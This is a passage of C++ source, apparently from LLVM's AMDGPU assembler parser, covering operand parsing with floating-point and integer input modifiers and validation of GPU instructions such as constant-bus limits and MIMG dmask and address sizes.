  // Integer or symbolic expression. Note: no token has been consumed
  // since S was captured on this path, so S is still the operand start
  // (the original code re-read getLoc() into a shadowing local here).
  int64_t IntVal;
  const MCExpr *Expr;

  if (HasSP3AbsModifier) {
    // This is a workaround for handling expressions
    // as arguments of SP3 'abs' modifier, for example:
    //     |1.0|
    //     |-1|
    //     |1+x|
    // This syntax is not compatible with syntax of standard
    // MC expressions (due to the trailing '|').
    SMLoc EndLoc;
    if (getParser().parsePrimaryExpr(Expr, EndLoc, nullptr))
      return MatchOperand_ParseFail;
  } else {
    if (Parser.parseExpression(Expr))
      return MatchOperand_ParseFail;
  }

  if (Expr->evaluateAsAbsolute(IntVal)) {
    Operands.push_back(AMDGPUOperand::CreateImm(this, IntVal, S));
  } else {
    Operands.push_back(AMDGPUOperand::CreateExpr(this, Expr, S));
  }

  // (The former trailing "return MatchOperand_NoMatch;" was
  // unreachable — both branches above return.)
  return MatchOperand_Success;
}
// Parse a register operand into Operands. NoMatch if the lookahead is
// not a register; ParseFail if it looked like one but failed to parse.
OperandMatchResultTy
AMDGPUAsmParser::parseReg(OperandVector &Operands) {
  if (!isRegister())
    return MatchOperand_NoMatch;

  auto RegOp = parseRegister();
  if (!RegOp)
    return MatchOperand_ParseFail;

  assert(RegOp->isReg());
  Operands.push_back(std::move(RegOp));
  return MatchOperand_Success;
}
// Parse either a register or an immediate. A modifier keyword yields
// NoMatch so the caller can handle it instead of the expression parser.
OperandMatchResultTy
AMDGPUAsmParser::parseRegOrImm(OperandVector &Operands, bool HasSP3AbsMod) {
  OperandMatchResultTy RegRes = parseReg(Operands);
  if (RegRes != MatchOperand_NoMatch)
    return RegRes;
  if (isModifier())
    return MatchOperand_NoMatch;
  return parseImm(Operands, HasSP3AbsMod);
}
bool
AMDGPUAsmParser::isNamedOperandModifier(const AsmToken &Token, const AsmToken &NextToken) const {
if (Token.is(AsmToken::Identifier) && NextToken.is(AsmToken::LParen)) {
const auto &str = Token.getString();
return str == "abs" || str == "neg" || str == "sext";
}
return false;
}
// True for an opcode modifier of the form "name:value".
bool
AMDGPUAsmParser::isOpcodeModifierWithVal(const AsmToken &Token, const AsmToken &NextToken) const {
  if (!Token.is(AsmToken::Identifier))
    return false;
  return NextToken.is(AsmToken::Colon);
}
// True for any operand modifier: SP3 '|' or a named one like abs(...).
bool
AMDGPUAsmParser::isOperandModifier(const AsmToken &Token, const AsmToken &NextToken) const {
  if (Token.is(AsmToken::Pipe))
    return true;
  return isNamedOperandModifier(Token, NextToken);
}
// True when the pair starts either a register or an operand modifier.
bool
AMDGPUAsmParser::isRegOrOperandModifier(const AsmToken &Token, const AsmToken &NextToken) const {
  if (isRegister(Token, NextToken))
    return true;
  return isOperandModifier(Token, NextToken);
}
// Check if this is an operand modifier or an opcode modifier
// which may look like an expression but it is not. We should
// avoid parsing these modifiers as expressions. Currently
// recognized sequences are:
// |...|
// abs(...)
// neg(...)
// sext(...)
// -reg
// -|...|
// -abs(...)
// name:...
// Note that simple opcode modifiers like 'gds' may be parsed as
// expressions; this is a special case. See getExpressionAsToken.
//
bool
AMDGPUAsmParser::isModifier() {

  AsmToken Tok = getToken();
  AsmToken NextToken[2];
  peekTokens(NextToken);

  // Plain operand modifier at the current position.
  if (isOperandModifier(Tok, NextToken[0]))
    return true;
  // An SP3 negation of a register or of another modifier.
  if (Tok.is(AsmToken::Minus) &&
      isRegOrOperandModifier(NextToken[0], NextToken[1]))
    return true;
  // "name:value" opcode modifier.
  return isOpcodeModifierWithVal(Tok, NextToken[0]);
}
// Check if the current token is an SP3 'neg' modifier.
// Currently this modifier is allowed in the following context:
//
// 1. Before a register, e.g. "-v0", "-v[...]" or "-[v0,v1]".
// 2. Before an 'abs' modifier: -abs(...)
// 3. Before an SP3 'abs' modifier: -|...|
//
// In all other cases "-" is handled as a part
// of an expression that follows the sign.
//
// Note: When "-" is followed by an integer literal,
// this is interpreted as integer negation rather
// than a floating-point NEG modifier applied to N.
// Besides being counter-intuitive, such use of floating-point
// NEG modifier would have resulted in different meaning
// of integer literals used with VOP1/2/C and VOP3,
// for example:
// v_exp_f32_e32 v5, -1 // VOP1: src0 = 0xFFFFFFFF
// v_exp_f32_e64 v5, -1 // VOP3: src0 = 0x80000001
// Negative fp literals with preceding "-" are
// handled likewise for uniformity
//
bool
AMDGPUAsmParser::parseSP3NegModifier() {
AsmToken NextToken[2];
peekTokens(NextToken);
if (isToken(AsmToken::Minus) &&
(isRegister(NextToken[0], NextToken[1]) ||
NextToken[0].is(AsmToken::Pipe) ||
isId(NextToken[0], "abs"))) {
lex();
return true;
}
return false;
}
// Parse an operand with optional floating-point input modifiers, in
// both named (neg(...), abs(...)) and SP3 (-x, |x|) forms. The parse
// order matters: SP3 neg, then "neg(", then "abs(", then SP3 '|', then
// the operand itself, then the matching closers in reverse order.
OperandMatchResultTy
AMDGPUAsmParser::parseRegOrImmWithFPInputMods(OperandVector &Operands,
                                              bool AllowImm) {
  bool Neg, SP3Neg;
  bool Abs, SP3Abs;
  SMLoc Loc;

  // Disable ambiguous constructs like '--1' etc. Should use neg(-1) instead.
  if (isToken(AsmToken::Minus) && peekToken().is(AsmToken::Minus)) {
    Error(getLoc(), "invalid syntax, expected 'neg' modifier");
    return MatchOperand_ParseFail;
  }

  SP3Neg = parseSP3NegModifier();

  Loc = getLoc();
  Neg = trySkipId("neg");
  // The two negation spellings are mutually exclusive.
  if (Neg && SP3Neg) {
    Error(Loc, "expected register or immediate");
    return MatchOperand_ParseFail;
  }
  if (Neg && !skipToken(AsmToken::LParen, "expected left paren after neg"))
    return MatchOperand_ParseFail;

  Abs = trySkipId("abs");
  if (Abs && !skipToken(AsmToken::LParen, "expected left paren after abs"))
    return MatchOperand_ParseFail;

  Loc = getLoc();
  SP3Abs = trySkipToken(AsmToken::Pipe);
  // Likewise abs(...) and |...| cannot be combined.
  if (Abs && SP3Abs) {
    Error(Loc, "expected register or immediate");
    return MatchOperand_ParseFail;
  }

  OperandMatchResultTy Res;
  if (AllowImm) {
    Res = parseRegOrImm(Operands, SP3Abs);
  } else {
    Res = parseReg(Operands);
  }
  if (Res != MatchOperand_Success) {
    // Once a modifier was consumed, NoMatch must be upgraded to a
    // hard failure — the tokens cannot be given back.
    return (SP3Neg || Neg || SP3Abs || Abs)? MatchOperand_ParseFail : Res;
  }

  if (SP3Abs && !skipToken(AsmToken::Pipe, "expected vertical bar"))
    return MatchOperand_ParseFail;
  if (Abs && !skipToken(AsmToken::RParen, "expected closing parentheses"))
    return MatchOperand_ParseFail;
  if (Neg && !skipToken(AsmToken::RParen, "expected closing parentheses"))
    return MatchOperand_ParseFail;

  AMDGPUOperand::Modifiers Mods;
  Mods.Abs = Abs || SP3Abs;
  Mods.Neg = Neg || SP3Neg;

  if (Mods.hasFPModifiers()) {
    AMDGPUOperand &Op = static_cast<AMDGPUOperand &>(*Operands.back());
    // Modifiers apply to registers/literals, not unresolved exprs.
    if (Op.isExpr()) {
      Error(Op.getStartLoc(), "expected an absolute expression");
      return MatchOperand_ParseFail;
    }
    Op.setModifiers(Mods);
  }

  return MatchOperand_Success;
}
// Parse an operand with an optional integer input modifier sext(...).
OperandMatchResultTy
AMDGPUAsmParser::parseRegOrImmWithIntInputMods(OperandVector &Operands,
                                               bool AllowImm) {
  bool Sext = trySkipId("sext");
  if (Sext && !skipToken(AsmToken::LParen, "expected left paren after sext"))
    return MatchOperand_ParseFail;

  OperandMatchResultTy Res;
  if (AllowImm) {
    Res = parseRegOrImm(Operands);
  } else {
    Res = parseReg(Operands);
  }
  if (Res != MatchOperand_Success) {
    // After consuming "sext(", NoMatch becomes a hard failure.
    return Sext? MatchOperand_ParseFail : Res;
  }

  if (Sext && !skipToken(AsmToken::RParen, "expected closing parentheses"))
    return MatchOperand_ParseFail;

  AMDGPUOperand::Modifiers Mods;
  Mods.Sext = Sext;

  if (Mods.hasIntModifiers()) {
    AMDGPUOperand &Op = static_cast<AMDGPUOperand &>(*Operands.back());
    // Modifiers apply to registers/literals, not unresolved exprs.
    if (Op.isExpr()) {
      Error(Op.getStartLoc(), "expected an absolute expression");
      return MatchOperand_ParseFail;
    }
    Op.setModifiers(Mods);
  }

  return MatchOperand_Success;
}
// Register-only variant: FP input modifiers allowed, immediates not.
OperandMatchResultTy
AMDGPUAsmParser::parseRegWithFPInputMods(OperandVector &Operands) {
  return parseRegOrImmWithFPInputMods(Operands, /*AllowImm=*/false);
}
// Register-only variant: int input modifiers allowed, immediates not.
OperandMatchResultTy
AMDGPUAsmParser::parseRegWithIntInputMods(OperandVector &Operands) {
  return parseRegOrImmWithIntInputMods(Operands, /*AllowImm=*/false);
}
// Parse either the keyword "off" (encoded as immediate 0) or a
// register operand.
OperandMatchResultTy AMDGPUAsmParser::parseVReg32OrOff(OperandVector &Operands) {
  SMLoc OffLoc = getLoc();
  if (trySkipId("off")) {
    Operands.push_back(AMDGPUOperand::CreateImm(this, 0, OffLoc,
                                                AMDGPUOperand::ImmTyOff, false));
    return MatchOperand_Success;
  }

  if (!isRegister())
    return MatchOperand_NoMatch;

  if (auto RegOp = parseRegister()) {
    Operands.push_back(std::move(RegOp));
    return MatchOperand_Success;
  }
  return MatchOperand_ParseFail;
}
// Reject matched instructions whose encoding conflicts with a forced
// suffix (_e32/_e64/_sdwa/_dpp), and steer VOP3-only-preferred opcodes
// back to the 32-bit encoding when no size was forced.
unsigned AMDGPUAsmParser::checkTargetMatchPredicate(MCInst &Inst) {
  uint64_t TSFlags = MII.get(Inst.getOpcode()).TSFlags;
  if ((getForcedEncodingSize() == 32 && (TSFlags & SIInstrFlags::VOP3)) ||
      (getForcedEncodingSize() == 64 && !(TSFlags & SIInstrFlags::VOP3)) ||
      (isForcedDPP() && !(TSFlags & SIInstrFlags::DPP)) ||
      (isForcedSDWA() && !(TSFlags & SIInstrFlags::SDWA)) )
    return Match_InvalidOperand;

  if ((TSFlags & SIInstrFlags::VOP3) &&
      (TSFlags & SIInstrFlags::VOPAsmPrefer32Bit) &&
      getForcedEncodingSize() != 64)
    return Match_PreferE32;

  if (Inst.getOpcode() == AMDGPU::V_MAC_F32_sdwa_vi ||
      Inst.getOpcode() == AMDGPU::V_MAC_F16_sdwa_vi) {
    // v_mac_f32/16 allow only dst_sel == DWORD;
    auto OpNum =
        AMDGPU::getNamedOperandIdx(Inst.getOpcode(), AMDGPU::OpName::dst_sel);
    const auto &Op = Inst.getOperand(OpNum);
    if (!Op.isImm() || Op.getImm() != AMDGPU::SDWA::SdwaSel::DWORD) {
      return Match_InvalidOperand;
    }
  }

  return Match_Success;
}
// The full set of asm encoding variants, tried when no particular
// encoding is forced by an opcode suffix.
static ArrayRef<unsigned> getAllVariants() {
  static const unsigned Variants[] = {
    AMDGPUAsmVariants::DEFAULT, AMDGPUAsmVariants::VOP3,
    AMDGPUAsmVariants::SDWA, AMDGPUAsmVariants::SDWA9, AMDGPUAsmVariants::DPP
  };

  return makeArrayRef(Variants);
}
// What asm variants we should check
// Returns the subset of encoding variants permitted by the forced
// suffix (if any); each subset lives in a function-local static so an
// ArrayRef into it stays valid after return.
ArrayRef<unsigned> AMDGPUAsmParser::getMatchedVariants() const {
  if (getForcedEncodingSize() == 32) {
    static const unsigned Variants[] = {AMDGPUAsmVariants::DEFAULT};
    return makeArrayRef(Variants);
  }

  if (isForcedVOP3()) {
    static const unsigned Variants[] = {AMDGPUAsmVariants::VOP3};
    return makeArrayRef(Variants);
  }

  if (isForcedSDWA()) {
    static const unsigned Variants[] = {AMDGPUAsmVariants::SDWA,
                                        AMDGPUAsmVariants::SDWA9};
    return makeArrayRef(Variants);
  }

  if (isForcedDPP()) {
    static const unsigned Variants[] = {AMDGPUAsmVariants::DPP};
    return makeArrayRef(Variants);
  }

  return getAllVariants();
}
// Human-readable name of the forced encoding variant ("" when none);
// the checks mirror the priority order in getMatchedVariants().
StringRef AMDGPUAsmParser::getMatchedVariantName() const {
  if (getForcedEncodingSize() == 32)
    return "e32";

  if (isForcedVOP3())
    return "e64";

  if (isForcedSDWA())
    return "sdwa";

  if (isForcedDPP())
    return "dpp";

  return "";
}
// Return the first implicit scalar input (FLAT_SCR/VCC/VCC_LO/VCC_HI/M0)
// read by Inst, or AMDGPU::NoRegister when there is none.
unsigned AMDGPUAsmParser::findImplicitSGPRReadInVOP(const MCInst &Inst) const {
  const MCInstrDesc &Desc = MII.get(Inst.getOpcode());
  for (unsigned I = 0, E = Desc.getNumImplicitUses(); I != E; ++I) {
    unsigned ImpUse = Desc.ImplicitUses[I];
    if (ImpUse == AMDGPU::FLAT_SCR || ImpUse == AMDGPU::VCC ||
        ImpUse == AMDGPU::VCC_LO || ImpUse == AMDGPU::VCC_HI ||
        ImpUse == AMDGPU::M0)
      return ImpUse;
  }
  return AMDGPU::NoRegister;
}
// NB: This code is correct only when used to check constant
// bus limitations because GFX7 supports no f16 inline constants.
// Note that there are no cases when a GFX7 opcode violates
// constant bus limitations due to the use of an f16 constant.
// Check whether the immediate at OpIdx can be encoded as an inline
// constant, dispatching on the operand's byte size and, for 16-bit
// operands, its exact operand type (int16 / packed v2i16 / packed
// v2f16 / f16).
bool AMDGPUAsmParser::isInlineConstant(const MCInst &Inst,
                                       unsigned OpIdx) const {
  const MCInstrDesc &Desc = MII.get(Inst.getOpcode());

  if (!AMDGPU::isSISrcOperand(Desc, OpIdx)) {
    return false;
  }

  const MCOperand &MO = Inst.getOperand(OpIdx);

  int64_t Val = MO.getImm();
  auto OpSize = AMDGPU::getOperandSize(Desc, OpIdx);

  switch (OpSize) { // expected operand size
  case 8:
    return AMDGPU::isInlinableLiteral64(Val, hasInv2PiInlineImm());
  case 4:
    return AMDGPU::isInlinableLiteral32(Val, hasInv2PiInlineImm());
  case 2: {
    const unsigned OperandType = Desc.OpInfo[OpIdx].OperandType;
    if (OperandType == AMDGPU::OPERAND_REG_IMM_INT16 ||
        OperandType == AMDGPU::OPERAND_REG_INLINE_C_INT16 ||
        OperandType == AMDGPU::OPERAND_REG_INLINE_AC_INT16)
      return AMDGPU::isInlinableIntLiteral(Val);

    if (OperandType == AMDGPU::OPERAND_REG_INLINE_C_V2INT16 ||
        OperandType == AMDGPU::OPERAND_REG_INLINE_AC_V2INT16 ||
        OperandType == AMDGPU::OPERAND_REG_IMM_V2INT16)
      return AMDGPU::isInlinableIntLiteralV216(Val);

    if (OperandType == AMDGPU::OPERAND_REG_INLINE_C_V2FP16 ||
        OperandType == AMDGPU::OPERAND_REG_INLINE_AC_V2FP16 ||
        OperandType == AMDGPU::OPERAND_REG_IMM_V2FP16)
      return AMDGPU::isInlinableLiteralV216(Val, hasInv2PiInlineImm());

    // Remaining 16-bit types are treated as f16.
    return AMDGPU::isInlinableLiteral16(Val, hasInv2PiInlineImm());
  }
  default:
    llvm_unreachable("invalid operand size");
  }
}
// How many distinct scalar values an instruction may read over the
// constant bus: 1 before GFX10; on GFX10+ generally 2, except for the
// 64-bit shifts, which still allow only one.
unsigned AMDGPUAsmParser::getConstantBusLimit(unsigned Opcode) const {
  if (!isGFX10Plus())
    return 1;

  switch (Opcode) {
  // 64-bit shift instructions can use only one scalar value input
  case AMDGPU::V_LSHLREV_B64_e64:
  case AMDGPU::V_LSHLREV_B64_gfx10:
  case AMDGPU::V_LSHRREV_B64_e64:
  case AMDGPU::V_LSHRREV_B64_gfx10:
  case AMDGPU::V_ASHRREV_I64_e64:
  case AMDGPU::V_ASHRREV_I64_gfx10:
  case AMDGPU::V_LSHL_B64_e64:
  case AMDGPU::V_LSHR_B64_e64:
  case AMDGPU::V_ASHR_I64_e64:
    return 1;
  default:
    return 2;
  }
}
// Does the operand at OpIdx consume a constant-bus slot? Non-inline
// immediates, SGPRs (other than null), and expressions all do.
bool AMDGPUAsmParser::usesConstantBus(const MCInst &Inst, unsigned OpIdx) {
  const MCOperand &MO = Inst.getOperand(OpIdx);
  if (MO.isImm())
    return !isInlineConstant(Inst, OpIdx);
  if (!MO.isReg())
    return true; // Expressions always use the bus.
  const MCRegisterInfo *TRI = getContext().getRegisterInfo();
  auto PReg = mc2PseudoReg(MO.getReg());
  return PReg != SGPR_NULL && isSGPR(PReg, TRI);
}
// Validate that a VOP/SDWA instruction does not read more distinct
// scalar values over the constant bus than the hardware allows.
// Counts implicit SGPR reads, each distinct explicit SGPR source, and
// the (single) literal — which counts as two values when it is reused
// at operands of different sizes.
bool
AMDGPUAsmParser::validateConstantBusLimitations(const MCInst &Inst,
                                                const OperandVector &Operands) {
  const unsigned Opcode = Inst.getOpcode();
  const MCInstrDesc &Desc = MII.get(Opcode);
  unsigned LastSGPR = AMDGPU::NoRegister;
  unsigned ConstantBusUseCount = 0;
  unsigned NumLiterals = 0;
  unsigned LiteralSize;

  if (Desc.TSFlags &
      (SIInstrFlags::VOPC |
       SIInstrFlags::VOP1 | SIInstrFlags::VOP2 |
       SIInstrFlags::VOP3 | SIInstrFlags::VOP3P |
       SIInstrFlags::SDWA)) {
    // Check special imm operands (used by madmk, etc)
    if (AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::imm) != -1) {
      ++NumLiterals;
      LiteralSize = 4;
    }

    SmallDenseSet<unsigned> SGPRsUsed;
    unsigned SGPRUsed = findImplicitSGPRReadInVOP(Inst);
    if (SGPRUsed != AMDGPU::NoRegister) {
      SGPRsUsed.insert(SGPRUsed);
      ++ConstantBusUseCount;
    }

    const int Src0Idx = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::src0);
    const int Src1Idx = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::src1);
    const int Src2Idx = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::src2);

    const int OpIndices[] = { Src0Idx, Src1Idx, Src2Idx };

    for (int OpIdx : OpIndices) {
      if (OpIdx == -1) break;

      const MCOperand &MO = Inst.getOperand(OpIdx);
      if (usesConstantBus(Inst, OpIdx)) {
        if (MO.isReg()) {
          LastSGPR = mc2PseudoReg(MO.getReg());
          // Pairs of registers with a partial intersections like these
          //   s0, s[0:1]
          //   flat_scratch_lo, flat_scratch
          //   flat_scratch_lo, flat_scratch_hi
          // are theoretically valid but they are disabled anyway.
          // Note that this code mimics SIInstrInfo::verifyInstruction
          if (!SGPRsUsed.count(LastSGPR)) {
            SGPRsUsed.insert(LastSGPR);
            ++ConstantBusUseCount;
          }
        } else { // Expression or a literal

          if (Desc.OpInfo[OpIdx].OperandType == MCOI::OPERAND_IMMEDIATE)
            continue; // special operand like VINTERP attr_chan

          // An instruction may use only one literal.
          // This has been validated on the previous step.
          // See validateVOPLiteral.
          // This literal may be used as more than one operand.
          // If all these operands are of the same size,
          // this literal counts as one scalar value.
          // Otherwise it counts as 2 scalar values.
          // See "GFX10 Shader Programming", section 3.6.2.3.

          unsigned Size = AMDGPU::getOperandSize(Desc, OpIdx);
          if (Size < 4) Size = 4;

          if (NumLiterals == 0) {
            NumLiterals = 1;
            LiteralSize = Size;
          } else if (LiteralSize != Size) {
            NumLiterals = 2;
          }
        }
      }
    }
  }
  ConstantBusUseCount += NumLiterals;

  if (ConstantBusUseCount <= getConstantBusLimit(Opcode))
    return true;

  // Point the diagnostic at whichever offending operand comes later.
  SMLoc LitLoc = getLitLoc(Operands);
  SMLoc RegLoc = getRegLoc(LastSGPR, Operands);
  SMLoc Loc = (LitLoc.getPointer() < RegLoc.getPointer()) ? RegLoc : LitLoc;
  Error(Loc, "invalid operand (violates constant bus restrictions)");
  return false;
}
// For instructions whose destination is marked EARLY_CLOBBER, verify
// that no source register overlaps the destination register.
bool
AMDGPUAsmParser::validateEarlyClobberLimitations(const MCInst &Inst,
                                                 const OperandVector &Operands) {
  const unsigned Opcode = Inst.getOpcode();
  const MCInstrDesc &Desc = MII.get(Opcode);

  const int DstIdx = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::vdst);
  if (DstIdx == -1 ||
      Desc.getOperandConstraint(DstIdx, MCOI::EARLY_CLOBBER) == -1) {
    return true;
  }

  const MCRegisterInfo *TRI = getContext().getRegisterInfo();

  const int Src0Idx = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::src0);
  const int Src1Idx = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::src1);
  const int Src2Idx = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::src2);

  assert(DstIdx != -1);
  const MCOperand &Dst = Inst.getOperand(DstIdx);
  assert(Dst.isReg());

  const int SrcIndices[] = { Src0Idx, Src1Idx, Src2Idx };

  for (int SrcIdx : SrcIndices) {
    if (SrcIdx == -1) break;
    const MCOperand &Src = Inst.getOperand(SrcIdx);
    if (Src.isReg()) {
      // regsOverlap also catches partial overlaps of register tuples.
      if (TRI->regsOverlap(Dst.getReg(), Src.getReg())) {
        const unsigned SrcReg = mc2PseudoReg(Src.getReg());
        Error(getRegLoc(SrcReg, Operands),
              "destination must be different than all sources");
        return false;
      }
    }
  }

  return true;
}
// On subtargets without integer clamp support, an IntClamp instruction
// is valid only when its clamp operand is 0.
bool AMDGPUAsmParser::validateIntClampSupported(const MCInst &Inst) {
  const unsigned Opc = Inst.getOpcode();
  const MCInstrDesc &Desc = MII.get(Opc);

  if ((Desc.TSFlags & SIInstrFlags::IntClamp) == 0 || hasIntClamp())
    return true;

  int ClampIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::clamp);
  assert(ClampIdx != -1);
  return Inst.getOperand(ClampIdx).getImm() == 0;
}
// Check that the vdata register width of a MIMG instruction matches
// the number of enabled dmask channels (plus one dword when tfe is
// set), halved for packed d16.
bool AMDGPUAsmParser::validateMIMGDataSize(const MCInst &Inst) {

  const unsigned Opc = Inst.getOpcode();
  const MCInstrDesc &Desc = MII.get(Opc);

  if ((Desc.TSFlags & SIInstrFlags::MIMG) == 0)
    return true;

  int VDataIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::vdata);
  int DMaskIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::dmask);
  int TFEIdx   = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::tfe);

  assert(VDataIdx != -1);

  if (DMaskIdx == -1 || TFEIdx == -1) // intersect_ray
    return true;

  unsigned VDataSize = AMDGPU::getRegOperandSize(getMRI(), Desc, VDataIdx);
  // (TFEIdx != -1 is already guaranteed by the early return above.)
  unsigned TFESize = (TFEIdx != -1 && Inst.getOperand(TFEIdx).getImm()) ? 1 : 0;
  unsigned DMask = Inst.getOperand(DMaskIdx).getImm() & 0xf;
  // dmask of 0 behaves like dmask of 1.
  if (DMask == 0)
    DMask = 1;

  // Gather4 always returns 4 channels regardless of dmask.
  unsigned DataSize =
    (Desc.TSFlags & SIInstrFlags::Gather4) ? 4 : countPopulation(DMask);
  if (hasPackedD16()) {
    int D16Idx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::d16);
    if (D16Idx >= 0 && Inst.getOperand(D16Idx).getImm())
      DataSize = (DataSize + 1) / 2;
  }

  return (VDataSize / 4) == DataSize + TFESize;
}
// GFX10+: check that the number of address VGPRs supplied to a MIMG
// instruction matches what the base opcode, dimension, a16 and g16
// settings require (NSA form counts one operand per address dword).
bool AMDGPUAsmParser::validateMIMGAddrSize(const MCInst &Inst) {
  const unsigned Opc = Inst.getOpcode();
  const MCInstrDesc &Desc = MII.get(Opc);

  if ((Desc.TSFlags & SIInstrFlags::MIMG) == 0 || !isGFX10Plus())
    return true;

  const AMDGPU::MIMGInfo *Info = AMDGPU::getMIMGInfo(Opc);
  const AMDGPU::MIMGBaseOpcodeInfo *BaseOpcode =
      AMDGPU::getMIMGBaseOpcodeInfo(Info->BaseOpcode);
  int VAddr0Idx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::vaddr0);
  int SrsrcIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::srsrc);
  int DimIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::dim);
  int A16Idx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::a16);

  assert(VAddr0Idx != -1);
  assert(SrsrcIdx != -1);
  assert(SrsrcIdx > VAddr0Idx);

  if (DimIdx == -1)
    return true; // intersect_ray

  unsigned Dim = Inst.getOperand(DimIdx).getImm();
  const AMDGPU::MIMGDimInfo *DimInfo = AMDGPU::getMIMGDimInfoByEncoding(Dim);
  // NSA: more than one operand slot between vaddr0 and srsrc.
  bool IsNSA = SrsrcIdx - VAddr0Idx > 1;
  unsigned ActualAddrSize =
      IsNSA ? SrsrcIdx - VAddr0Idx
            : AMDGPU::getRegOperandSize(getMRI(), Desc, VAddr0Idx) / 4;
  bool IsA16 = (A16Idx != -1 && Inst.getOperand(A16Idx).getImm());

  unsigned ExpectedAddrSize =
      AMDGPU::getAddrSizeMIMGOp(BaseOpcode, DimInfo, IsA16, hasG16());

  if (!IsNSA) {
    // Non-NSA addresses >8 dwords round up to a 16-dword tuple.
    if (ExpectedAddrSize > 8)
      ExpectedAddrSize = 16;

    // Allow oversized 8 VGPR vaddr when only 5/6/7 VGPRs are required.
    // This provides backward compatibility for assembly created
    // before 160b/192b/224b types were directly supported.
    if (ActualAddrSize == 8 && (ExpectedAddrSize >= 5 && ExpectedAddrSize <= 7))
      return true;
  }

  return ActualAddrSize == ExpectedAddrSize;
}
// Restrict the dmask of MIMG atomics (instructions that both load and
// store) to 0x1, 0x3 or 0xf.
bool AMDGPUAsmParser::validateMIMGAtomicDMask(const MCInst &Inst) {
  const unsigned Opc = Inst.getOpcode();
  const MCInstrDesc &Desc = MII.get(Opc);

  if ((Desc.TSFlags & SIInstrFlags::MIMG) == 0)
    return true;
  if (!(Desc.mayLoad() && Desc.mayStore()))
    return true; // Not atomic

  int DMaskIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::dmask);
  unsigned DMask = Inst.getOperand(DMaskIdx).getImm() & 0xf;

  // This is an incomplete check because image_atomic_cmpswap
  // may only use 0x3 and 0xf while other atomic operations
  // may use 0x1 and 0x3. However these limitations are
  // verified when we check that dmask matches dst size.
  switch (DMask) {
  case 0x1:
  case 0x3:
  case 0xf:
    return true;
  default:
    return false;
  }
}
// GATHER4 instructions use dmask as a channel selector, so exactly one
// of the four bits (1=red, 2=green, 4=blue, 8=alpha) must be set.
bool AMDGPUAsmParser::validateMIMGGatherDMask(const MCInst &Inst) {
  const unsigned Opc = Inst.getOpcode();
  const MCInstrDesc &Desc = MII.get(Opc);

  if ((Desc.TSFlags & SIInstrFlags::Gather4) == 0)
    return true;

  int DMaskIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::dmask);
  unsigned DMask = Inst.getOperand(DMaskIdx).getImm() & 0xf;

  // The ISA document doesn't mention this restriction.
  switch (DMask) {
  case 0x1:
  case 0x2:
  case 0x4:
  case 0x8:
    return true;
  default:
    return false;
  }
}
bool AMDGPUAsmParser::validateMIMGMSAA(const MCInst &Inst) {
const unsigned Opc = Inst.getOpcode();
const MCInstrDesc &Desc = MII.get(Opc);
if ((Desc.TSFlags & SIInstrFlags::MIMG) == 0)
return true;
const AMDGPU::MIMGInfo *Info = AMDGPU::getMIMGInfo(Opc);
const AMDGPU::MIMGBaseOpcodeInfo *BaseOpcode =
AMDGPU::getMIMGBaseOpcodeInfo(Info->BaseOpcode);
if (!BaseOpcode->MSAA)
return true;
int DimIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::dim);
assert(DimIdx != -1);
unsigned Dim = Inst.getOperand(DimIdx).getImm();
const AMDGPU::MIMGDimInfo *DimInfo = AMDGPU::getMIMGDimInfoByEncoding(Dim);
return DimInfo->MSAA;
}
// True for the SDWA forms of v_movrels/v_movrelsd on GFX10.
static bool IsMovrelsSDWAOpcode(const unsigned Opcode)
{
  return Opcode == AMDGPU::V_MOVRELS_B32_sdwa_gfx10 ||
         Opcode == AMDGPU::V_MOVRELSD_B32_sdwa_gfx10 ||
         Opcode == AMDGPU::V_MOVRELSD_2_B32_sdwa_gfx10;
}
// movrels* opcodes should only allow VGPRS as src0.
// This is specified in .td description for vop1/vop3,
// but sdwa is handled differently. See isSDWAOperand.
// Reject SGPR or constant src0 for the SDWA movrels opcodes (only
// VGPRs are allowed there); other encodings enforce this via .td.
bool AMDGPUAsmParser::validateMovrels(const MCInst &Inst,
                                      const OperandVector &Operands) {

  const unsigned Opc = Inst.getOpcode();
  const MCInstrDesc &Desc = MII.get(Opc);

  if ((Desc.TSFlags & SIInstrFlags::SDWA) == 0 || !IsMovrelsSDWAOpcode(Opc))
    return true;

  const int Src0Idx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::src0);
  assert(Src0Idx != -1);

  SMLoc ErrLoc;
  const MCOperand &Src0 = Inst.getOperand(Src0Idx);
  if (Src0.isReg()) {
    auto Reg = mc2PseudoReg(Src0.getReg());
    const MCRegisterInfo *TRI = getContext().getRegisterInfo();
    // Non-SGPR registers (i.e. VGPRs) are fine.
    if (!isSGPR(Reg, TRI))
      return true;
    ErrLoc = getRegLoc(Reg, Operands);
  } else {
    ErrLoc = getConstLoc(Operands);
  }

  Error(ErrLoc, "source operand must be a VGPR");
  return false;
}
bool AMDGPUAsmParser::validateMAIAccWrite(const MCInst &Inst,
const OperandVector &Operands) {
const unsigned Opc = Inst.getOpcode();
if (Opc != AMDGPU::V_ACCVGPR_WRITE_B32_vi)
return true;
const int Src0Idx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::src0);
assert(Src0Idx != -1);
const MCOperand &Src0 = Inst.getOperand(Src0Idx);
if (!Src0.isReg())
return true;
auto Reg = mc2PseudoReg(Src0.getReg());
const MCRegisterInfo *TRI = getContext().getRegisterInfo();
if (isSGPR(Reg, TRI)) {
